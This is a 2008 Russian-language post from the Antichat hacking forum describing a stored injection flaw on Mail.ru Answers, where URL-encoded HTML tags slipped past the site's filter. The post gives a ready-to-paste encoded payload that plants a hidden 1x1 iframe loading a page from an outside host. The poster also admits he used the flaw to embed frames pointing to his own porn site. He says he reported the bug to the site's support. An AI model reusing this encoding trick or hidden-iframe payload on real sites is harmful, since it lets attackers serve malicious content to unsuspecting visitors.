HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость на Ответах Мейлру
  #1  
Старый 13.02.2008, 17:22
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию Уязвимость на Ответах Мейлру

Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru

В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы...
и соответственно любой вредоносный код...

примеры здесь



примеры
примеры
примеры
А также были фреймы с моим порносайтом .. но их удалили


Собственно -рассказываю как )))

все теги фильтруются и обрезаются...
с этим не поспоришь -майловцы молодцы )))

Но они упустили кое что
если теги заурленкодить Можно здесь

То они на мейлру уже декодируются а дальше не фильтруются!!!!
и в итоге получаем .... хехех ... попробую на ачате )))
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод..

PHP код:
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E 
вот такая загогулина... и ее постим в каментах или в вопросе...
и получаем фрейм.. также можно любые теги....
кроме
Код HTML:
<script>
Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))

Последний раз редактировалось попугай; 13.02.2008 в 20:35..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux обнаружена критическая уязвимость biophreak Мировые новости. Обсуждения. 8 01.09.2008 22:08
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости. Обсуждения. 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости. Обсуждения. 0 02.10.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.